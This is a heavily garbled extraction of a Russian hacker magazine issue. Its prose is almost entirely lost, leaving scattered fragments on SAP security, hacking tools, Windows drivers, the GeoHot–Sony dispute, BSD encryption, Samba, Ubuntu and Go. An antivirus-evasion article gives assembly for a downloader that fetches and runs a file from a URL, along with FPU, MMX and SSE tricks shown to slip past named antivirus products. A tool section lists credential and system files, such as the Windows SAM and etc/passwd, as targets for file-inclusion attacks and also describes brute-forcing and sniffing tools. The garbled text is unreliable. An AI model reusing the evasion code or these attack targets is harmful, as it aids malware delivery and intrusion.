enterprise (ERP, BPM, PLM ).
enterprise- . ERP (Enterprise Resource Planning ) SAP.
. ,
ERP- 1:. 1
, SAP ,
. .
2006 ,
SAP. 2007
067
, BlackHat
C
( Cybsec)
BlackHat RFC,
SAP. 2009
. ,
2007-2008 SAP , 2010 ! 2011 , ,
. ,
, web- SAP-
. , ,
BlackHat,
. ,
. , ,
(, ). , , , SSO, HTTP-.
, , ,
2006 ! SAP SSO
, ,
. ,
, ERP- .
,
ERP-, , google-;
ActiceX- ;
,
,
, , , .
-
, . , , ,
,
068
,
Metasploit egyp7
.
,
-,
OpenEdge.
,
,
( )
, . -
! ,
, . , .
.
-,
. , -,
. - ,
Metasploit Oracle.
- Oracle Application Server
Oracle Fusion Middleware,
- Oracle E-business Suite.
, - ,
( ), Research@
dsecrg.com, , , ,
Blackhat :). z
X 04 /147/ 2011
5
BlackHat 2011
AutoRun:
Windows,
(
). , ,
Stuxnet USB, Windows.
,
USB-
AutoRun . ?
,
USB- , , , .
security- . (
) ,
,
. Windows,
,
Linux, USB- .
GPRS/EDGE/UMTS/HSPA
,
, $10 000.
,
(Rogue BTS),
.
.
GPRS EDGE (2G) , ,
GPRS- EDGE- .
, , UMTS- HSPA
(3G)-.
GPRS/EDGE,
2G-, 3G-.
, USB?
!
LiveCD
.
, ,
,
.. LiveCD ( !), .
.
. ?
, ,
LiveCD,
.
, Tor,
LiveCD-
.
Mac
- , Mac
, , ? !
Black Hat
Mac. - , ()
(
), . ,
.
Mac OS X Snow Leopard,
IDA Pro.
069
(icq 884888, snipper.ru)
X-TOOLS
: Lamescan 3
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: redsh
Radmin !
ICQ
Radmin Lamescan. .
, Lamescan 3 Radmin 2.x
/ Radmin 3.x.
:
.
,
.
;,
( ,
,
).
(0,
)
.
newpass__.txt,
;_;_.
, ,
,
Request
failed. Check the old and new password2.
.
: avtuh.
ru/2010/04/26/extra-icq-password-changermass.html.
;
Radmin 2.x 3.x
;
,
;
/
;
CSV
HTML;
viewer
(/
);
SOCKS TCP;
Radmin;
;
.
IpGeoBase
HIMIKAT.
, .
070
: 0x4553-Intercepter
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: ares
0x4553Intercepter ares.
:
ICQ/IRC/AIM/
FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/
HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/
VNC/MYSQL/ORACLE
ICQ/AIM/
JABBER/YAHOO/MSN/GADU-GADU/IRC/MRA
MAC- ;
,
;
eXtreme-;
pcap-
- ;
RPCAP ;
ARP poison;
eml POP3 SMTP;
ARP DHCP (
DHCP ).
,
intercepter.nerf.ru
.
: UnShortURL
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: avtuh
, , ,
.
, .
,
, ,
. .
UnShortURL
X 04 /147/ 2011
.
.
. Link
/ .
:
ad.vu, adjix.com, alturl.com,
b23.ru, bit.ly, budurl.com,
clck.ru, cli.gs, fly2.ws, goo.gl,
idek.net, is.gd, moourl.com,
murl.kz, nn.nf, nsfw.in, ow.ly,
pnt.me, shorl.com, sn.im,
snipurl.com, tiny.cc, tinyurl.com,
tr.im, u.nu, url.ie, w3t.org,
www.x.se, yep.it, yourls.org
(,
).
.
: avtuh.ru/2010/06/30/unshorturl.html.
: DepositFiles Brute
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
:
depositfiles.com
,
-
depositfiles.com,
-
.
. DepositFiles
Brute.
:
:;
;
;
;
.
-
.
X 04 /147/ 2011
: lfimap
: *nix/win
: Augusto Pereyra
etc/clamav/clamd.conf
etc/clamav/freshclam.conf
etc/ca-certificates.conf
Windows
boot.ini
AppServ/MySQL/data/mysql/user.MYD
WINDOWS/system32/driversetc/hosts
WINDOWS/repair/SAM
Lfimap
,
, , LFI (local
file include).
:
( );
(windows, linux);
;
linux windows;
;
basic-
( --user --passw);
null-
(
--null);
( --output);
proxy (
--proxy).
:
python lfimap.py -t http://www.test.
com/ss.php?page=[LFI]
.
, :
Linux
var/log/httpd/access_log
proc/self/environ
proc/version
var/log/apache2/access.log
var/log/httpd-access.log
usr/localetc/apache22/httpd.conf
etc/apache2/apache2.conf
etc/httpd/conf/httpd.conf
var/log/mysqld.log
etc/mysql/my.cnf
var/lib/mysql/mysql/user.MYD
etc/inittab
etc/sysctl.conf
etc/passwd
etc/ts.conf
, lfimap
.
:ICQ Password
Recalling
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Karas
ICQ Password Recalling.
-
ICQ, (QIP, Jimm,
ICQ ),
.
,
,
.
, ,
,
, ,
UIN ,
.
:
1. ICQ
.
2. IP
( 127.0.0.1).
3. .
4. ( ,
).
5.
login.icq.com.
forum.
asechka.ru/showthread.php?t=109235. z
071
MALWARE
(stannic.man@gmail.com)
ring0-
. ,
- .
][, . , , - .
(
Windows) . . ,
: ,
,
. , , , , . ,
072
,
,
, .
?
!
Windows ,
: ,
. , , 2008 , X 04 /147/ 2011
IOCTL Fuzzer
MS08-025,
Windows XP Windows Server 2003. , win32k.
sys, , .
- ,
( Windows NT 4.0 ),
, , Windows Ring-0. ,
,
, win32k.sys
.
win32k.sys
. (
), 0-day . WinAPI RtlQueryRegistryValues,
EntryContext
.
, .
,
-
r0-,
. ,
- ,
, . ,
X 04 /147/ 2011
-
, IRP-, ,
-
ring3 ring0.
,
. , -. ,
. ,
-
.
,
IoCreateDevice.
-. -
(, , , ),
(,
). ,
, DRIVER_OBJECT,
IRP- (IRP I/O
Request Packet).
DRIVER_OBJECTMajorFunction,
IRP-
:
DVD
dvd
DVD-
Windows
Esagelab
.
HTTP://WWW
links
:
j00ru.vexillium.org;
ivanlef0u.tuxfamily.org.
typedef
NTSTATUS
(*PDRIVER_DISPATCH) (
__in struct _DEVICE_OBJECT *DeviceObject,
__in struct _IRP *Irp
);
073
MALWARE
- SPARK
, (CodeRed)
Solar Designer
2010
2009
2008
2005
2001
2000
2007
1988
1972
1980
1996
1990
1997
1970
1995
Bugtracke
Phrack Aleph One Smashing the Stack for Fun and Profit
Nergal's Phrack
Hovav Shacham - x86
-
DeviceObject
( ), Irp ,
:
, ,
.
.
,
074
X 04 /147/ 2011
- . ,
? .
-,
, , (
Windows) , 12 . -,
( , )
. .
.
. ,
- , ,
Windows . Windows
(IRQL),
, .
, IRQL, , .
. , IRQL,
. ,
IRQL,
,
. , , .
( ,
),
. ,
IRQL', ( BSOD'). ,
(, ,
Windows), , ,
.
ESP, .
,
,
, ESP,
X 04 /147/ 2011
.
, ,
. : (nonpaged) , ,
. , , , .
, ,
, . ,
,
.
,
, IRQL,
.
VirtualLock,
.
, , -
.
, -
, IRP-,
, .
,
, ,
,
, , . IOCTL Fuzzer (code.google.
com/p/ioctlfuzzer),
, , ,
.
, ,
,
. z
075
MALWARE
Symantec,
McAfee Trend Micro
. ,
malware-. , .
, , ? IDC 2009 . ,
( ) .
, 20082009 . , ,
076
Symantec McAfee .
. ? ,
, Trend Micro Sophos.
! -. ,
- .
X 04 /147/ 2011
, %
($M US GAAP)
Symantec
McAfee
Trend Micro
KL
Sophos
AVG
ESET
FSecure
BitDefender
Panda
Other
Total
2360
1191
596
380
203
190
160
150
140
132
1098
6600
35,76
18,05
9,03
5,76
3,08
2,88
2,42
2,27
2,12
2,00
16,64
100,00
,
, ,
. ][ .
, .
? ,
(,
, ).
, .
, , ,
. , . ,
,
. , , ,
.
:
Symantec Norton Internet Security 2011;
McAfee McAfee Total Protection;
Trend Micro Titanium Maximum Security;
Sophos Endpoint Security and Data
Protection.
,
. :
, ( ),
.
.
- ,
FPU, MMX SSE.
,
(
DVD). Downloader . masm32v10.
:
start:
push
push
push
push
0
0
offset PathToSave
offset TargetURL
X 04 /147/ 2011
IDC
2009
push 0
call URLDownloadToFileA
push
push
push
push
push
push
call
0
0
0
offset PathToSave
offset OpenString
0
ShellExecute
push 0
call ExitProcess
API URLDownloadToFileA,
ShellExecute.
, , , :
Norton Internet Security 2011
. ,
.
,
API- :
LoadLibrary, GetProcAddress,
call reg.
:
start:
push offset urlmonStr
call LoadLibraryA
push offset downloadfunc
push eax
call GetProcAddress
push
push
push
push
0
0
offset PathToSave
offset TargetURL
DVD
dvd
. , !
077
MALWARE
. 21 42-
push 0
call eax
push offset shell32Str
call LoadLibraryA
push offset executefunc
push eax
call GetProcAddress
push
push
push
push
push
push
call
0
0
0
offset PathToSave
offset OpenString
0
eax
push 0
call ExitProcess
?
Sophos. .
, . , FPU-.
. !
push 0
push 1
fld qword ptr [esp]
mov dword ptr [esp], 0
mov dword ptr [esp + 4], 0
fst qword ptr [esp]
mov eax, [esp]
test eax, eax
jz Exit
. 0x00000000 0x00000001.
ST0
, ESP. ,
ST0 .
MOV [ESP] [ESP+4] .
: QWORD ST0
[ESP], [ESP]
EAX. , TEST EAX,
EAX .
FPU-, EAX
ExitProcess.
Sophos .
MMX .
start:
start:
xor eax, eax
finit
078
AV-
SimpleDownloader
GPA Downloader
GPA Downloader
+ FPU
GPA Downloader
+ MMX
GPA Downloader
+ SSE
Symantec
McAfee
Downloader-AE
TrendMicro
MAL_DLDER
Sophos
Troj/Apher-Fam
Mal/DownLdr-AC
Mal/DownLdr-AC
Mal/DownLdr-AC
Mal/DownLdr-AC
0ffh,0ffh
start:
xor eax, eax
mov ecx, offset DQWORD_VAL
db 00fh, 10h, 01h
db 00fh, 50h, 0c0h
test eax, eax
jz Exit
. .
push 0
movq qword ptr [esp], MM0
mov eax, [esp]
test eax, eax
jz Exit
.
, FLD FST MOVQ. .
Endpoint Security and Data Protection
, . , , ,
SSE.
DQWORD_VAL db 0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,
0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,
X 04 /147/ 2011
, , :
db 00fh ? ?. :
, masm32 ( MicroSoft)
, , ,
.
MOVUPS XMM0, [ECX] MOVMSKPS EAX, XMM0. ,
,
,
. ?
MOVUPS, , . , ,
,
,
.
MOVMSKPS,
Extract Packed Single-Precision Floating-Point Sign Mask.
DWORD, XMM, ,
(32- ).
? , Sophos .
- .
.
?
,
. Sophos,
. -, ,
, ,
MOVMSKPS :).
, , : , AV-
. z
079
Mifrill (mifrill@real.xakep.ru)
GeoHot vs Sony
,
GeoHot Sony, (PlayStation 3) . , GeoHot
, , .
,
, GeoHot, .
, .
, . 21 ,
9- 1989 , .
c , GeoHot,
million75 mil. , -,
, . , , GeoHot
.
,
. 2000- ISEF
Intel International Science and Engineering Fair.
, .
ISEF 2004 The Mapping Robot.
,
,
Today Show. ,
The Googler.
( )
, GeoHot , .
Titanium Knights, .
Neuropilot , OpenEEG, -
. ISEF
2007 . I want a Holodeck
,
.
( Intel
), .
080
(Fox, CNN, NBC, CBS, G4, ABC, CNBC, BBC),
(, Forbes) IT-. , ,
PC World -10
21 .
, ,
. . (
) 2008-2009 ,
iPhone Apple, blackra1n
purplera1n.
( 17-) , , , . , ,
(
DMCA , :)),
. , , (
Dev Team, ih8sn0w chronicdev) , , . , ,
. , GeoHot
,
.
, , iPhone ( PS3)
. -
,
,
. ,
, . ,
iPhone ,
Certicell, Nissan 350Z iPhone 8 .
X 04 /147/ 2011
- Sony
1 500 000
. -,
( App Store, Maps, GameCenter
Calendar, ), - . ,
Apple ,
! , : , Apple ,
, ,
Apple .
GeoHot , , (,
, ).
,
RC1b, (,
081
limera1n
,
Fail0verflow
, GeoHot
) . , , . ,
Apple-.
PS3
Sony
, .
, , , GeoHot. ,
,
, iPhone
, .
2009-
, A Real Challenge ( ).
Sony
PlayStation 3, .
USB-,
PlayStation 2, .
GeoHot ,
(22 2010 ) ,
. , PS3
Linux, , , .
Linux OtherOS. , /
, .
! 26 ,
, GeoHot : Sony
.
. Sony ,
,
OtherOS. , Slim-
082
. ,
! , , Linux OtherOS .
,
GeoHot , PlayStation 3 3.21 , ,
OtherOS. , , 3.21OO,
Slim- . , , .
, , . - ,
, 2010. , PS3 ,
.
.
( ,
- !),
GeoHot. ,
2011 homebrew ,
PS3 3.55.
, , Fail0verflow.
Sony . Chaos Communication Congress
,
,
Sony .
-
. , - GeoHot,
.
,
homebrew- 3.55. geohot.com (
X 04 /147/ 2011
iPhone, .
rootkey-),
. Sony . 21
2011 Sony Computer Entertainment America
Fail0verflow
, DMCA ( ), . (,
Sony) 27 , GeoHot
,
PlayStation 3. ,
Sony temporary restraining order
-.
.
- . -,
, -,
.
-, ,
DMCA, ,
, , ,
. , , .
,
,
, , . -, GeoHot
Fail0verflow , ,
.
Linux homebrew-, . , , PS3 .
. Sony
, .
YouTube, Twitter, Google, PayPal Slashdot,
Kickstarter Github. ? ,
.
, ,
, -
Fail0verflow YouTube! , ,
fail0verflow.com , , YouTube Facebook- ,
. Sony ,
,
.
PlayStation Network Qriocity.
X 04 /147/ 2011
: ISEF 2005
The Googler
. ,
(,
). GeoHot , Electronic Frontier Foundation.
, Sony , , ,
. ,
, GeoHot
( , ) Fail0verflow.
,
. Sony (
, DLC, PSN),
. G4, Sony
, , ?
.
, GeoHot . , ,
, .
, Sony
YouTube. ,
GeoHot
:). ,
. geohot.com , ,
, .
.
. , , ,
. - .
, ? z
083
UNIXOID
(zobnin@gmail.com)
BSD
UNIX, ,
Linux, BSD-.
, , FreeBSD OpenBSD.
BSD-
, Linux. ,
,
.
, man-
. , .
FreeBSD, 2010
:
GEOM- GELI, ( )
XTS PEFS,
. OpenBSD, -
084
softraid,
RAID-. , ,
.
GELI:
GELI FreeBSD,
,
. GELI FreeBSD- ,
.
XTS ( , XTS ,
).
X 04 /147/ 2011
XTS: ?
Unix-way
. ,
,
.
,
.
, ,
.
CBC (Cipher Block Chaining), XOR'
,
. CBC
,
, multiscan, watermarking .
,
,
. XTS.
GELI
split(1),
geli :
GELI
- GEOM, , -. ,
. ,
, , ,
(
GEOM GEOM', 96- z). GELI
(AES, Blowfish
3DES) , , ,
(,
, ), (
, /tmp swap). XTS, GELI
,
(
),
( GELI
loop-aes). GELI
FreeBSD,
X 04 /147/ 2011
, OpenBSD
:
% sysctl -a | grep swapenc | head -n1
vm.swapencrypt.enable=1
:
# echo 'geom_eli_load="YES"' >> /boot/loader.conf
(salt), -,
. :
# dd if=/dev/random of=~/ad1.key bs=64 count=1
,
:
# geli init -s 4096 -K ~/ad1.key -e AES \
-a hmac/sha512 -l 256 /dev/ad1
'-s' ( 4096 (4 ),
085
UNIXOID
OpenBSD
GELI ), '-K'
, '-e' , '-a'
, '-l' .
. ,
,
(256- AES )
'-K'.
, GELI , CBC, XTS. ,
( , ).
GELI , :
(
), /etc/rc.conf /boot/loader.conf:
/dev /dev/ad1.eli,
:
# dd if=/dev/random of=/dev/ad1.eli bs=64k
# newfs /dev/ad1.eli
# mount /dev/ad1.eli /mnt
GELI :
# umount /mnt
# geli detach ad1.eli
,
:
# geli attach -k ~/ad1.key /dev/ad1
# mount /dev/ad1.eli /mnt
, - ad1.key
, .
, . /boot/loader.
conf :
geli_ad1_keyfile0_load="YES"
geli_ad1_keyfile0_type="ad1:geli_keyfile0"
geli_ad1_keyfile0_name="/boot/ad1.key"
/etc/fstab ,
.eli. :
/dev/ad1.eli /home ufs rw 2 2
086
geli_devices="ad1"
geli_ad0s1g_flags="-k /etc/geli/ad1.key"
geli_ad0s1g_autodetach="NO"
GELI
,
:
# dd if=/dev/random of=/dev/ad0s1b bs=64k
# geli onetime -d ad0s1b
# swapon /dev/ad0s1b.eli
PEFS:
PEFS FreeBSD
GELI, .
fuse- encfs
(encfs.sf.net), . PEFS
root-,
, ,
.
PEFS , :
,
, fuse;
,
-;
(, , );
,
, ;
AES, Camellia Salsa20;
XTS;
;
UFS, ZFS ext2;
X 04 /147/ 2011
RAID-
- SVND
PAM- .
PEFS
fsx, pjdfstest, blogbench dbench.
UFS. GELI, PEFS
FreeBSD,
,
:
OpenBSD:
#
#
#
#
#
#
portinstall git
git clone git://github.com/glk/pefs.git pefs
cd pefs
make obj all
make install
make clean
. ( secure):
# mkdir ~/secure
PEFS . ,
vfs.usermount 1, (sysctl -w
vm.usermount=1).
# pefs mount ~/secure ~/secure
. , (
: PEFS 256- AES CTR,
):
# pefs addkey -a aes256-xts ~/secure
, :
# pefs showkeys ~/secure
:
# echo "Very private data" > ~/secure/test
# cat ~/secure/test
Very private data
# pefs unmount ~/secure
# ls -l ~/secure
X 04 /147/ 2011
OpenBSD
SVND (Safe Vnode
Disk Driver),
.
4.4, 2008 , softraid, ,
: ?
, .
, .
SVND ,
-,
.
crypto softraid RAID-,
, - . , SVND.
SVND crypto softraid ,
. , SVND. OpenBSD (, ,
BSD) - vnd(4),
, , . SVND ,
.
vnconfig(8),
. , .
dd:
# dd if=/dev/arandom of=/tmp/crypto.salt count=1
# dd if=/dev/zero of=/tmp/crypto.img bs=1m count=1024
:
# vnconfig -c -K 2000 -S /tmp/crypto.salt /dev/svnd0c \
/tmp/crypto.img
svnd0 /dev.
MBR BSD- ( , ,
/dev/svnd0c):
# fdisk -iy svnd0
# disklabel -E svnd0
087
UNIXOID
a a, w q, <Enter>. a,
:
# newfs /dev/rsvnd0a
# mount /dev/svnd0a /mnt
:
# umount /mnt
# vnconfig -u svnd0
:
# vnconfig -c -K 2000 -S /tmp/crypto.salt /dev/svnd0 \
/tmp/crypto.img
# mount /dev/svnd0a /mnt
crypto softraid .
.
OpenBSD 4.4. -.
S .
,
root- ( - 256 ), swap-
,
softraid. :
# fdisk -iy wd0
# disklabel -E wd0
a a <Enter> ,
size ( size 256M). . a b, -
(, 1G), <Enter>. a d,
<Enter>
( ),
(FS type) RAID. crypto softraid. w q.
RAID- wd0d (
),
bioctl(8):
, .
, ,
,
. ,
,
,
. , OpenBSD ,
, . <Enter> -
:
# bioctl -c C -l /dev/wd0d softraid0 && exit
.
,
.
NetBSD:
,
, NetBSD. CGD
(Cryptographic Device Driver),
,
( OpenBSD).
cgdconfig(8), . , (
) ,
- ( ). sd0:
# cgdconfig -g -o /etc/cgd/sd0 aes-cbc
cgd0, - ,
/dev/sd0:
# cgdconfig cgd0 /dev/sd0
.
:
.
sd0. :
# /install
, wd0 . , (Use
(W)hole disk...), W .
(Use (A)uto layout...) C, disklabel.
m a ( a), <Enter>
, mount point ( mount point
/). w q.
sd0.
-RAID, , <Enter>. disklabel, a a,
256M, /altroot.
/usr, /tmp, /var,
/root, /home . RAID-. . -
088
# newfs /dev/cgd0
# mount /dev/cgd0 /mnt
cgd0:
# umount /dev/cgd0
# cgdconfig -u cgd0
, :
# cgdconfig cgd0 /dev/sd0
# mount /dev/cgd0 /mnt
BSD- . , , ,
. , . BSD,
. z
X 04 /147/ 2011
UNIXOID
iv (ivinside.blogspot.com)
,
Samba-
,
, . nc
NFS, CUPS.
Samba, .
Samba SMB/
CIFS. ,
Windows,
.
, ,
.
SMB .
( ) (
) .
( )
. ,
Arch Linux :
# pacman -S samba smbclient
090
# cp /etc/samba/smb.conf.default /etc/samba/smb.conf
# /etc/rc.d/samba start
: smbd () nmbd ( ). ,
Samba,
smbclient.
- , Dolphin Nautilus.
, ,
. smbclient , ,
.
1. smbclient , SMB-.
,
ftp.
X 04 /147/ 2011
HTTP://WWW
links
:
Samba 3.5
3.5
SMB2,
Vista/Se7en.
SMB2 ( 100
, 19)
. :
1. 100-
(timestamp
resolution). Linux-
2.6.22 glibc 2.6.
2.
CUPS.
cups encrypt.
3. Winbind
.
, wbinfo -g wbinfo -u
.
3.5.6 8
2010 .
,
,
.
2. smbtree SMB- . ,
Windows.
,
.
3. mount.cifs umount.cifs
Linux CIFS.
Linux,
CIFS. ,
mount
-t cifs, -i ( ).
Samba
smbmount smbumount, , ,
mount.cifs umount.cifs.
Samba
,
smb.conf(5).
,
,
:
X 04 /147/ 2011
smb.conf 8076
: Samba 4.0
Samba4
Samba3
Active Directory Domain Controller ( Win2k )
SMB-
Microsoft.
LDAP-, Active
Directory ; Kerberos KDC (Key
Distribution Center) ; ACL ;
(Microsoft VFS)
.
4.0
Samba-
Active Directory.
3.x,
.
4.0.0TP1
2006 . -
. 4.0.0-alpha14 24
2010 .
$ cat /etc/samba/smb.conf
[global]
;
workgroup = WRKGRP
;
security = SHARE
[myshare]
;
path = /usr/somewhere/shared
;
read only = Yes
;
(nobody)
guest ok = Yes
/usr/somewhere/shared WRKGRP .
(
), global
, ( ), ( myshare).
Samba:
samba.org;
Samba
PDC: opennet.
ru/base/net/samba_
pdc_slackware.txt.
html;
: smb-conf.ru.
INFO
info
CIFS
SMB,
Windows ,
Network Attached
Storage.
SambaTHG,
2000 -
,
.
Samba
-
Win2k3
( ITLabs).
091
UNIXOID
Nautilus:
,
printers, :
[printers]
path = /usr/spool/public
guest ok = yes
printable = yes
global
load printers = yes.
:
1. security ,
.
SHARE . USER,
. ,
.
2. hosts allow ,
. , IP- ,
150.203. IP-
150.203.0.0/16. ,
. ,
.
3. log file . : , /var/log/
samba/%m.log -
,
.
4. include .
, %m,
: include = /usr/local/samba/lib/smb.conf.%m.
5. interfaces ,
Samba. ,
lo. ,
/.
6. guest only yes, .
7. invalid users ,
.
UNIX/NIS, @ + .
8. create mask . 0744, . .
092
9. directory mask , .
10. browseable ,
.
[public]
create mask = 0400
directory mask = 0700
path = /export/public
writeable = yes
[archive]
path = /export/archive
writeable = no
browseable = no
Samba .
sockets options. , ( , )
,
.
Linux
( socket(7)). Samba :
[global]
socket options = TCP_NODELAY IPTOS_LOWDELAY
SO_RCVBUF=65536 SO_SNDBUF=65536
:
1. TCP_NODELAY . Samba
2.0 ,
30%.
2. IPTOS_LOWDELAY .
, .
TCP_NODELAY
20%.
3. SO_RCVBUF SO_SNDBUF Samba.
,
.
,
100 100 1 ,
. 100-
:
X 04 /147/ 2011
smb.conf
$ dd if=/dev/zero of=testfile count=10240 bs=10240
100 1 :
$ cat mkfiles.sh
#!/bin/bash
for ((i=1; i<=100; i++)); do
dd if=/dev/zero of=testfile${i} count=1024 bs=1024
done
:
$ mount -t cifs -o guest //192.168.1.101/share \
/home/user/share/
:
$ time cp /home/user/share/testfile /home/user/
, ,
( Y ).
: Samba ,
. smb.conf ,
:
1. hide files
,
(
). /, ,
,
.
.
X 04 /147/ 2011
DVD
dvd
DVD-
Samba
Webmin.
093
UNIXOID
Webmin -,
Samba
8. syslog syslog. 1,
. 0,
.
, -.
, Samba AIO_
SUPPORT, :
aio read size = 16384
aio write size = 16384
aio write behind = true
Shit happens
Samba .
, .
global:
dos charset = cp866
unix charset = UTF8
display charset = UTF8
CUPS,
.
Samba, global :
/etc/xinetd.d/swat :
service swat
{
type = UNLISTED
protocol = tcp
port = 901
socket_type = stream
wait = no
user = root
server = /usr/sbin/swat
log_on_success += HOST DURATION
log_on_failure += HOST
disable = no
}
load printers = no
show add printer wizard = no
printing = none
printcap name = /dev/null
disable spoolss = yes
WinXP , , ,
.
: 139/tcp 445/tcp. , 139- ,
getpeername failed. Error was Transport endpoint is not connected.
, global
smb ports = 139.
GUI
094
! SWAT http://localhost:901.
Samba
Webmin,
.
# pacman -S webmin perl-net-ssleay
# /etc/rc.d/webmin start
-
https://localhost:10000.
Samba .
20%. , :
200%. z
X 04 /147/ 2011
UNIXOID
(zobnin@gmail.com)
Ubuntu
,
Ubuntu
2 ? ,
, .
Linux ,
, .
4 .
,
(
, -
).
?
, Linux
. Linux
, . ,
99% : ,
; , ,
;
X 04 /147/ 2011
;
; .
.
Linux . -
API,
win32 Windows Cocoa Mac OS X, Linux
. , GTK, Qt FLTK.
, ,
,
.
, ,
095
UNIXOID
(zobnin@gmail.com)
Gnome Ubuntu
. ,
Accessories. (gcalctool),
(gucharmap),
(baobab),
(gnome-search-tool) Tomboy. :
BleachBit:
Ubuntu
(
). ,
:
$ aptitude purge $(aptitude search ~ilinuximage -F %p|egrep -v "$(uname -r)|linux-imagegeneric")
. , ,
. ,
, ,
. , Ubuntu
Tomboy,
mono, 30 . Linux-
, ,
, ,
.
, , Ubuntu
-
.
, Ubuntu df -h. 1.9 .
. Games,
- .
:
$ sudo apt-get purge gnome-games-common gbrainy
096
10 mono. :
$ sudo apt-get purge mono-2.0-gac mono-charp-shell \
mono-gac mono-gmcs mono-runtime
30 .
. : pitivi. ,
- , apt-file,
:
$ sudo apt-get install apt-file
$ apt-file update
$ apt-file search /usr/bin/gnome-sound-recorder
gnome-media: /usr/bin/gnome-sound-recorder
(, ) gnome-media, :
$ sudo apt-get purge gnome-media
2.5 , . ,
VNC- Remote Desktop. ,
, :
$ sudo apt-get purge gnome-dictionary \
wamerican vinagre tsclient rdesktop
5 .
,
, ,
Ubuntu:
$ sudo apt-get purge gnome-accesibility-themes
gnome-doc-utils gnome-mag gnome-screensaver
screensaver-default-images xscreensaver-\*
gnome-user-guide example-content checkbox\*
branding-ubuntu
167 .
,
X 04 /147/ 2011
.
orphaner, deborphan:
$ sudo apt-get install deborpan
, , K.
,
.
, .
, ,
Ubuntu , , .
.
Ubuntu ,
. , , , web-
gmail, Ubuntu-
Rhytmbox (, ,
Amarok iTunes).
. -
IM- . .
, Ubuntu
OpenOffice. , , , ,
, , :
$ sudo apt-get purge openoffice\*
256 . .
: mail- Evolution,
Totem
Rhytmbox:
$ sudo apt-get purge evolution evolution-common
evolution-data-server evolution-indicator
evolution-plugins evolution-webcal libevolution
totem totem-common libtotem\* rhytmbox mediaplayer-info libgnome-media0
26 . -
gstreamer, Totem Rhytmbox,
. -, gstreamer
,
.
,
Brasero. ,
:
$ sudo apt-get purge gstreamer0.10-alsa
gstreamer0.10-nonlin gstreamer-0.10-nice
gstreamer0.10-plugins-base gstreamer0.10plugins-base-apps gstreamer0.10-plugins good
gstreamer0.10-pulseaudio gstreamer0.10-tools
gstreamer0.10-x gnome-codec-install brasero\*
orphaner
, , ,
Nautilus:
$ sudo apt-get purge shotwell
4 . , IM- Empathy
Gwibber. , ,
:
$ sudo apt-get purge empathy empathy-common
telepathy-\* gwibber gwibber-service
18 . BitTorrent-
transmission firefox,
Deluge
Google Chrome. System
Administration. , . ,
Computer Janitor. -
. , :
DVD
dvd
im_too_lazy_to_type_
it.txt.
copynpaste.
INFO
$ sudo apt-get purge computer-janitor\*
, :
info
-
$ sudo apt-get purge language-selector
,
language-elector-common
,
. - - .
, Ubuntu apt-get
,
, ,
, -
, .
.
, , Ubuntu - Bluetooth, -
, , . apt-get
, ,
3G Wi-Fi . , . Bluetooth : sudo apt-get
:
clean.
$ sudo apt-get purge bluez\*
097
UNIXOID
-
Bluetooth-,
bluez,
gnome- . : 12 .
, ? ,
. Ubuntu
Simple Scan, SANE.
, :
$ sudo apt-get purge libsane
15 . : ,
, , ,
Ubuntu, , :
$ sudo apt-get purge cups cups-common hpijs hplip-data
gsfonts
. Ubuntu
Xorg, . ,
, , , .
:
irrus,geode,i128,i740,intel,mach64,mga,neomagic,nouveau,
nv,openchrome,r128,radeon,rendition,s3,s3virge,savage,
siliconmotion,sis,sisusb,tdfx,trident,tseng,vmware,voodoo}
nVidia ATi:
$ sudo apt-get purge nvidia-\* fglrx-modaliases radeontool
, Ubuntu ,
,
, 90 :
$ sudo apt-get purge linux-headers-\*
,
,
, .
, . , compiz (,
, ):
$ sudo apt-get purge compiz\*
, ,
:
$ sudo apt-get purge espeak\* speach-dispatcher gnome-rca
Matched ,
. ,
, .
apt-get. apt-get purge
xserver-xorg-video-, <Enter>
, , .
, ,
fbdev vesa:
$ sudo apt-get purge xserver-xorg-video-{apm,ati,chips,
098
, , (, ):
$ sudo apt-get purge gcc-4.4 gdb make
courchdb erlang,
Gnome, :
$ sudo apt-get purge erlang\* courchdb
smbclient,
X 04 /147/ 2011
Xorg-
, (
50 ):
:
$ sudo localepurge
xulrunner, XUL:
$ sudo apt-get purge xulrunner-1.9.2
:
$ df -h
:
$ sudo /usr/share/{doc,gtk-doc}
, ,
Gnome -
.
: ,
gnome, , . Ubuntu ,
, , , Gnome, ,
kubuntu-desktop, KDE (
gnome, , apt-get ). Ubuntu Gnome
- : Ubuntu
Server ,
, , ,
gnome- .
, .
Ubuntu
Gnome, (
, ),
. , ,
apt-get purge.
. ,
, Ubuntu Gnome
500, , , . z
099
CODING
(zobnin@gmail.com)
Go
, -
.
.
Python .
Erlang
, .
Go ,
.
, , ,
, , Limbo.
, ,
, Go ,
Limbo.
Go 10 2009
. , UNIX,
UTF-8, Google,
, Go .
100
,
- -,
Go - .
- . .
Go ,
, ,
, . Go -
, Pascal ADA,
, , ,
X 04 /147/ 2011
INFO
info
Go
GCC
4.6
- .
, , , , Go
, .
Go :
1. .
2. , .
3. ,
.
?
.
Go -
,
, ,
C++. , ,
Go ,
.
,
, .
Go
, , , , , .
, ( C++
,
,
).
,
,
. ,
, .
. X 04 /147/ 2011
,
, .
,
,
.
Go , , ,
, .
,
( , , , ).
( ),
, , , ,
(
, Go, ).
, Go ,
,
. Go
Pascal, Modula Oberon:
. ,
,
, Go :
Go
gofmt,
.
Go
: i, j = j, i
HTTP://WWW
links
Go FAQ: golang.org/
doc/go_faq.html.
Go-:
golang.org/doc/
go_tutorial.html.
Go:
golang.org/doc/effective_go.html.
Go
: golang.org/
doc/go_mem.html.
Go , . , , ,
, ( ,
).
, ,
101
CODING
Web- Go-
, , ,
( , , C++).
Go,
( Limbo,
Inferno). ,
, ,
, (CSP). ,
Occam Limbo, CSP,
. , ,
, , ,
, CSP
: ,
.
Go :
1. -.
2. , -
, ,
.
( ).
3. go.
4. .
,
,
. ,
? ?
, Go,
,
, . ,
,
, Go
.
102
1 package main
2
3 import "time"
4 import "fmt"
5
6 func timer(ch chan string, ns, count int) {
7 for j := 1; j <= count; j++ {
8
time.Sleep(int64(ns))
9
if j == count {
10
fmt.Printf("[timer]
...\n")
11
ch <- "!"
12
} else {
13
fmt.Printf("[timer] ...\n")
14
ch <- ""
15
}
16
